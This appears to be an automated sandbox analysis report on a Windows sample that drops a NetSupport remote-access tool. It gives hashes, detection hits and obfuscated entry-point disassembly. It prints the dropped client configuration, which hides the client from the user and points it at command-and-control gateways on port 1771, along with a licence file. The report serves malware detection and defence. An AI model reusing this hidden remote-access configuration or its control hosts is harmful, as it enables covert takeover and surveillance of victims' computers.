                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:wrOxDJs/Ksdl0R1dBmhFXxRpP9JNvbnPUGI:3yXlQmhhHp9J9bnPTI
                                                                                                              MD5:4182F37B9BA1FA315268C669B5335DDE
                                                                                                              SHA1:2C13DA0C10638A5200FED99DCDCF0DC77A599073
                                                                                                              SHA-256:A74612AE5234D1A8F1263545400668097F9EB6A01DFB8037BC61CA9CAE82C5B8
                                                                                                              SHA-512:4F22AD5679A844F6ED248BF2594AF94CF2ED1E5C6C5441F0FB4DE766648C17D1641A6CE7C816751F0520A3AE336479C15F3F8B6EBE64A76C38BC28A02FF0F5DC
                                                                                                              Malicious:false
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SuportUpWin\AudioCapture.dll, Author: Joe Security
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                                              • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                                              • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                                              • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                                              • Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse
                                                                                                              • Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse
                                                                                                              • Filename: , Detection: malicious, Browse
                                                                                                              • Filename: upd_8707558.msix, Detection: malicious, Browse
                                                                                                              • Filename: information_package.exe, Detection: malicious, Browse
                                                                                                              • Filename: Update_2762895.msix, Detection: malicious, Browse
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..in.:n.:n.:g.6:|.:g. :".:g.':J.:g.0:i.:n.:5.:g.):i.:g.1:o.:p.7:o.:g.2:o.:Richn.:........PE..L......U...........!.........j.......S............0.................................5f..............................@*..-...."..P....P..X............D..x)...`..4...p...................................@...............@............................text............................... ..`.rdata..m;.......<..................@..@.data........0......................@....rsrc...X....P.......$..............@..@.reloc..T....`.......,..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\hkpqXovZtS.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):328056
                                                                                                              Entropy (8bit):6.7547459359511395
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:Hib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OKB:Hib5YbsXioEgULFpSzya9/lY5SilQCfR
                                                                                                              MD5:C94005D2DCD2A54E40510344E0BB9435
                                                                                                              SHA1:55B4A1620C5D0113811242C20BD9870A1E31D542
                                                                                                              SHA-256:3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                                                                                              SHA-512:2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SuportUpWin\HTCTL32.DLL, Author: Joe Security
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 13%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: Update.js, Detection: malicious, Browse
                                                                                                              • Filename: update.js, Detection: malicious, Browse
                                                                                                              • Filename: Update.js, Detection: malicious, Browse
                                                                                                              • Filename: update.js, Detection: malicious, Browse
                                                                                                              • Filename: updates.js, Detection: malicious, Browse
                                                                                                              • Filename: updates.js, Detection: malicious, Browse
                                                                                                              • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                                                              • Filename: updates.js, Detection: malicious, Browse
                                                                                                              • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                                                              • Filename: Update_124.0.6367.158.js, Detection: malicious, Browse
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......._....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\hkpqXovZtS.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):259
                                                                                                              Entropy (8bit):5.103526864179364
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:O/oPzQyak4xRPjwxXTkoaydDKHMoEEjLgpW2Mch6IXZNWYpPM/ioUBENLa8l6i7s:XbQyaZR7wxooT8JjjqW2Ma6aNBPM/ioc
                                                                                                              MD5:866C96BA2823AC5FE70130DFAAA08531
                                                                                                              SHA1:892A656DA1EA264C73082DA8C6E5F5728ABCB861
                                                                                                              SHA-256:6A7C99E4BD767433C25D6DF8DF81BAA99C05DD24FA064E45C306FF4D954E1921
                                                                                                              SHA-512:0DAFC66222BBFCB1558D9845EE4DDEB7A687561B08B86A07B66B120C22952A8082E041D9234D9C69C8ADE5D4DAE894D3F10AFD7BA6DD3F057A08FB5D57C42112
                                                                                                              Malicious:false
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview:1200..0xaeabfe5c....; NetSupport License File...; Generated on 13:16 - 19/09/2017........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=GFHJJYU43..maxslaves=100000..os2=1..product=10..serial_no=NSM832428..shrink_wrap=0..transport=0..
                                                                                                              Process:C:\Users\user\Desktop\hkpqXovZtS.exe
                                                                                                              File Type:Generic INItialization configuration [Features]
                                                                                                              Category:dropped
                                                                                                              Size (bytes):6458
                                                                                                              Entropy (8bit):4.645519507940197
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
                                                                                                              MD5:88B1DAB8F4FD1AE879685995C90BD902
                                                                                                              SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                                                                                                              SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                                                                                                              SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                                                                                                              Malicious:false
                                                                                                              Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t
                                                                                                              Process:C:\Users\user\Desktop\hkpqXovZtS.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):18808
                                                                                                              Entropy (8bit):6.292094060787929
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:dogL7bo2t6n76RRHirmH/L7jtd3hfwjKd3hfwB7bjuZRvI:dogL7bo2YrmRTAKT0iTI
                                                                                                              MD5:104B30FEF04433A2D2FD1D5F99F179FE
                                                                                                              SHA1:ECB08E224A2F2772D1E53675BEDC4B2C50485A41
                                                                                                              SHA-256:956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                                                                                              SHA-512:5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SuportUpWin\PCICHEK.DLL, Author: Joe Security
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yu....i...i...i.......i..Z...i.......i......i......i..l....i...h.~.i......i......i......i.......i.Rich..i.................PE..L....A.W...........!......................... ...............................`.......U....@.........................@#..r...h!..P....@............... ..x)...P......P ............................... ..@............ ..D............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\hkpqXovZtS.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3740024
                                                                                                              Entropy (8bit):6.527276298837004
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:49152:0KJKmPEYIPqxYdoF4OSvxmX3+m7OTqupa7HclSpTAyFMJa:0KJ/zIPq7F4fmXO8u6kS+y/
                                                                                                              MD5:D3D39180E85700F72AAAE25E40C125FF
                                                                                                              SHA1:F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
                                                                                                              SHA-256:38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
                                                                                                              SHA-512:471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\SuportUpWin\PCICL32.DLL, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SuportUpWin\PCICL32.DLL, Author: Joe Security
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J.>N+.mN+.mN+.m.eAmL+.mU.Gmd+.m!]rmF+.mU.EmJ+.mGSZmA+.mGS]mO+.mGSJmi+.mN+.m.(.mU.rm.+.mU.sm.+.mU.BmO+.mU.CmO+.mU.DmO+.mRichN+.m........................PE..L......X...........!.....(...$ .............@................................9.....Y.9.............................p................p................8.x)...`7.p....Q.......................c......@c..@............@..(.......`....................text...l'.......(.................. ..`.rdata..s....@.......,..............@..@.data....%... ......................@....tls.........P......................@....hhshare.....`......................@....rsrc........p......................@..@.reloc...3...`7..4....6.............@..B................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\hkpqXovZtS.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):396664
                                                                                                              Entropy (8bit):6.80911343409989
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:HqArkLoM/5iec2yxvUh3ho2LDnOQQ1k3+h9APjbom/n6:ekuK2XOjksobom/n6
                                                                                                              MD5:2C88D947A5794CF995D2F465F1CB9D10
                                                                                                              SHA1:C0FF9EA43771D712FE1878DBB6B9D7A201759389
                                                                                                              SHA-256:2B92EA2A7D2BE8D64C84EA71614D0007C12D6075756313D61DDC40E4C4DD910E
                                                                                                              SHA-512:E55679FF66DED375A422A35D0F92B3AC825674894AE210DBEF3642E4FC232C73114077E84EAE45C6E99A60EF4811F4A900B680C3BF69214959FA152A3DFBE542
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SuportUpWin\TCCTL32.DLL, Author: Joe Security
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 6%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L....8.W...........!................'................................................P....@.............................o...D...x....0..@...............x)...@..\E..................................Pd..@...............h............................text............................... ..`.rdata..............................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc...F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\hkpqXovZtS.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):106864
                                                                                                              Entropy (8bit):4.698068367430546
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:qkhNAEVV5+6j6Qa86Fkv2Wr120hZl4gtV5ttV2ikB:qwRVVZl6FhWr80/WgtV7tV2ikB
                                                                                                              MD5:F76954B68CC390F8009F1A052283A740
                                                                                                              SHA1:3112A39AAD950045D6422FB2ABE98BED05931E6C
                                                                                                              SHA-256:63315DF7981130853D75DC753E5776BDF371811BCFCE351557C1E45AFDD1EBFB
                                                                                                              SHA-512:D3AEA0867B488161F62E43E7C250AD3917713B8B183139FB6E06C71594FB0CEC769E1494B7CC257117992AE4AA891E056F99C25431AE19F032B1BA779051A880
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe, Author: Joe Security
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 30%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L...y.(Y.....................r...... ........ ....@..................................|....@.................................< ..<....0...l...........x..p).......... ............................................... ...............................text............................... ..`.rdata..^.... ......................@..@.rsrc....l...0...n..................@..@.reloc..l............v..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\hkpqXovZtS.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):825
                                                                                                              Entropy (8bit):5.376567239934958
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:pBrEmPfapz1l11fXtID4nRVUBmuZlfLnYs:pBrEAi11f9I0nRyBmuVLnT
                                                                                                              MD5:39E51AF377AAEEF1B0727E50E7FDECCF
                                                                                                              SHA1:0209CC69414B8A9667BA025782F4E2E01CAD6EC4
                                                                                                              SHA-256:EC74508F2DEA1155DA0CF4EDDC0AA338F6DE75616AD96685EA8972DBDBAA88EF
                                                                                                              SHA-512:D0EF076B5C76E9D9FE4F3ED98CB3A3478C7B48C30CF03169E980D3E68164E0C66FE2152BA909A7CFFDCA7C84DB06ECA9DFDEAAF6D3C24B723A133CF553F1BF4C
                                                                                                              Malicious:false
                                                                                                              Preview:0x6e4b5ede....[Client].._present=1..DisableChat=1..DisableClientConnect=1..DisableDisconnect=1..DisableLocalInventory=1..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RoomSpec=Eval..Shared=1..silent=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=0..Usernames=*..ValidAddresses.TCP=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[Bridge]..PasswordFile=C:\Program Files (x86)\NetSupport\NetSupport Manager\jernder43.psw..Protocol=0....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=pbkvithtosh07.com:1771..GSK=GM<BAFEM9N?CDDHG<KAAFG;I..Port=1771..SecondaryGateway=pbkvithtosh08.com:1771..SecondaryPort=1771....[View]..ScrollDelay=6..
                                                                                                              Process:C:\Users\user\Desktop\hkpqXovZtS.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):773968
                                                                                                              Entropy (8bit):6.901559811406837
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                              MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                              SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                              SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                              SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\hkpqXovZtS.exe
                                                                                                              File Type:Windows setup INFormation
                                                                                                              Category:dropped
                                                                                                              Size (bytes):328
                                                                                                              Entropy (8bit):4.93007757242403
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                              MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                              SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                              SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                              SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                              Malicious:false
                                                                                                              Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                                                                                              Process:C:\Users\user\Desktop\hkpqXovZtS.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):46
                                                                                                              Entropy (8bit):4.532048032699691
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                                                                              MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                                                                              SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                                                                              SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                                                                              SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                                                                              Malicious:false
                                                                                                              Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....
                                                                                                              Process:C:\Users\user\Desktop\hkpqXovZtS.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):33144
                                                                                                              Entropy (8bit):6.7376663312239256
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:JFvNhAyi5hHA448qZkSn+EgT8ToDXTVi0:JCyoHA448qSSzgIQb
                                                                                                              MD5:34DFB87E4200D852D1FB45DC48F93CFC
                                                                                                              SHA1:35B4E73FB7C8D4C3FEFB90B7E7DC19F3E653C641
                                                                                                              SHA-256:2D6C6200508C0797E6542B195C999F3485C4EF76551AA3C65016587788BA1703
                                                                                                              SHA-512:F5BB4E700322CBAA5069244812A9B6CE6899CE15B4FD6384A3E8BE421E409E4526B2F67FE210394CD47C4685861FAF760EFF9AF77209100B82B2E0655581C9B2
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SuportUpWin\pcicapi.dll, Author: Joe Security
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\hkpqXovZtS.exe
                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):63864
                                                                                                              Entropy (8bit):6.446503462786185
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:Tf6fvDuNcAjJMBUHYBlXU1wT2JFqy9BQhiK:D6f7cjJ4U4I1jFqy92hiK
                                                                                                              MD5:6FCA49B85AA38EE016E39E14B9F9D6D9
                                                                                                              SHA1:B0D689C70E91D5600CCC2A4E533FF89BF4CA388B
                                                                                                              SHA-256:FEDD609A16C717DB9BEA3072BED41E79B564C4BC97F959208BFA52FB3C9FA814
                                                                                                              SHA-512:F9C90029FF3DEA84DF853DB63DACE97D1C835A8CF7B6A6227A5B6DB4ABE25E9912DFED6967A88A128D11AB584663E099BF80C50DD879242432312961C0CFE622
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 24%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$U..`4..`4..`4..{.D.q4..{.p.54..iLI.e4..`4..74..{.q.}4..{.@.a4..{.G.a4..Rich`4..................PE..L......U.....................J.......!............@.......................... .......o....@....................................<.......T...............x)..............................................@...............@............................text............................... ..`.rdata...%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):7.835343377119646
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:hkpqXovZtS.exe
                                                                                                              File size:3'338'375 bytes
                                                                                                              MD5:885a317f0e6471b48210a165fa878af7
                                                                                                              SHA1:0beccc1ab4baa6ae9c9a735ecc0719b75031c394
                                                                                                              SHA256:197c2d218121ff0ec738f5d301bf13b7824320c07942b99c9f278e8d7508b15d
                                                                                                              SHA512:6e017371d637ddfd56229cc7ba2da4285b9ab3e6891d11c5b27ff784bcf5063ae1dcc65b51e1445944ae12df1d72791a485f365776ccd245b2a03bde1c05ca08
                                                                                                              SSDEEP:98304:Ol2fRAinZNWMWvrcRoJfr0zVVQrY92iVzc/JFUhdM:M/iZNXWTc5zXQkfI/Ah6
                                                                                                              TLSH:D1F5D093AFEB1278D7AC18FB96F0E20FA7619DC91A96C0D0EB453F46E8F305261D4641
                                                                                                              File Content Preview:MZ......................@...............SENS............................!..L.!This program cannot be run in DOS mode....$.......[.................:.......,.......<...............+.{.....=.......;.......>.....Rich............PE..L......Q.................L.
                                                                                                              Icon Hash:0f3352caca713b8f
                                                                                                              Entrypoint:0x4df11c
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x518CCAAC [Fri May 10 10:23:40 2013 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:5
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:5
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:5
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:299facae7e3811e3ba17036d8f5262d2
                                                                                                              Instruction
                                                                                                              push eax
                                                                                                              push ebx
                                                                                                              sub esp, 08h
                                                                                                              mov eax, dword ptr [esp+18h]
                                                                                                              mov dword ptr [esp+04h], eax
                                                                                                              mov eax, dword ptr [esp+14h]
                                                                                                              mov dword ptr [esp], eax
                                                                                                              call 00007F13290D6E44h
                                                                                                              mov dword ptr [esp+04h], eax
                                                                                                              pop ebx
                                                                                                              nop
                                                                                                              nop
                                                                                                              nop
                                                                                                              nop
                                                                                                              ret
                                                                                                              add byte ptr [ebp-74FBDB9Ch], cl
                                                                                                              rcr byte ptr [ecx+edx*2+04244C8Bh], FFFFFF8Dh
                                                                                                              dec ecx
                                                                                                              or byte ptr [edi-76FBDBB4h], al
                                                                                                              dec esp
                                                                                                              and al, 04h
                                                                                                              mov ecx, dword ptr [esp]
                                                                                                              lea esp, dword ptr [esp+04h]
                                                                                                              call 00007F13290E9525h
                                                                                                              pushfd
                                                                                                              add ebp, 1Bh
                                                                                                              popfd
                                                                                                              lea ebp, dword ptr [ebp-1Bh]
                                                                                                              add dword ptr [esp+00h], FFF94395h
                                                                                                              xchg dword ptr [esp+00h], ebx
                                                                                                              push ecx
                                                                                                              mov ecx, dword ptr [esp+04h]
                                                                                                              lea ecx, dword ptr [ecx+7Ch]
                                                                                                              xchg dword ptr [esp+04h], ecx
                                                                                                              mov dword ptr [esp+04h], ecx
                                                                                                              mov ecx, dword ptr [esp]
                                                                                                              lea esp, dword ptr [esp+04h]
                                                                                                              xchg dword ptr [esp+04h], ebx
                                                                                                              lea edi, dword ptr [edi]
                                                                                                              xchg dword ptr [esp+00h], ebx
                                                                                                              push eax
                                                                                                              mov eax, dword ptr [esp+04h]
                                                                                                              lea eax, dword ptr [eax+27h]
                                                                                                              xchg dword ptr [esp+04h], eax
                                                                                                              mov dword ptr [esp+04h], eax
                                                                                                              mov eax, dword ptr [esp]
                                                                                                              lea esp, dword ptr [esp+04h]
                                                                                                              popfd
                                                                                                              push edi
                                                                                                              mov edi, dword ptr [esp+04h]
                                                                                                              lea edi, dword ptr [edi+35h]
                                                                                                              xchg dword ptr [esp+04h], edi
                                                                                                              mov dword ptr [esp+04h], edi
                                                                                                              mov edi, dword ptr [esp]
                                                                                                              lea esp, dword ptr [esp+04h]
                                                                                                              ret
                                                                                                              push ebx
                                                                                                              mov ebx, dword ptr [esp+04h]
                                                                                                              lea ebx, dword ptr [ebx+7Eh]
                                                                                                              xchg dword ptr [esp+04h], ebx
                                                                                                              mov dword ptr [esp+04h], ebx
                                                                                                              mov ebx, dword ptr [esp]
                                                                                                              lea esp, dword ptr [esp+04h]
                                                                                                              add al, byte ptr [eax+eax+00000000h]
                                                                                                              Programming Language:
                                                                                                              • [ASM] VS2008 SP1 build 30729
                                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                                              • [IMP] VS2008 SP1 build 30729
                                                                                                              • [C++] VS2008 SP1 build 30729
                                                                                                              • [EXP] VS2008 SP1 build 30729
                                                                                                              • [LNK] VS2008 SP1 build 30729
                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x2aef00x33.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xfbc7c0xdc.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1040000x250f4.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x263f00x1c.rdata
